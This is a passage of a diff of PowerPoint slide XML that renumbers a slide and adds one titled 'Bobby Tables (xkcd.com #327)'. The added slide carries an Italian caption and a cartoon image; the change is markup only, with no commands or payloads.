-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="B7B7B7"/>
-                </a:solidFill>
-                <a:latin typeface="Barlow Condensed"/>
-                <a:ea typeface="Barlow Condensed"/>
-                <a:cs typeface="Barlow Condensed"/>
-                <a:sym typeface="Barlow Condensed"/>
-              </a:rPr>
-              <a:t>Molto più di una textbox</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="B7B7B7"/>
-              </a:solidFill>
-              <a:latin typeface="Barlow Condensed"/>
-              <a:ea typeface="Barlow Condensed"/>
-              <a:cs typeface="Barlow Condensed"/>
-              <a:sym typeface="Barlow Condensed"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="3" name="Picture 2" descr="A cartoon of two people&#10;&#10;AI-generated content may be incorrect.">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74250F4B-E526-08C0-F935-DD5E12CE8501}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1594451" y="2432471"/>
-            <a:ext cx="5955097" cy="1834814"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide45.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:bg>
@@ -24516,6 +25615,189 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide46.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2288581" y="1497613"/>
+            <a:ext cx="4566836" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Bobby Tables (xkcd.com #327)</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30"/>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="122" name="Google Shape;122;p30"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1311750" y="2070313"/>
+            <a:ext cx="6520500" cy="169200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="B7B7B7"/>
+                </a:solidFill>
+                <a:latin typeface="Barlow Condensed"/>
+                <a:ea typeface="Barlow Condensed"/>
+                <a:cs typeface="Barlow Condensed"/>
+                <a:sym typeface="Barlow Condensed"/>
+              </a:rPr>
+              <a:t>Molto più di una textbox</a:t>
+            </a:r>
+            <a:endParaRPr sz="1100" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="B7B7B7"/>
+              </a:solidFill>
+              <a:latin typeface="Barlow Condensed"/>
+              <a:ea typeface="Barlow Condensed"/>
+              <a:cs typeface="Barlow Condensed"/>
+              <a:sym typeface="Barlow Condensed"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="A cartoon of two people&#10;&#10;AI-generated content may be incorrect.">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74250F4B-E526-08C0-F935-DD5E12CE8501}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1594451" y="2432471"/>
+            <a:ext cx="5955097" cy="1834814"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>

</xml_diff>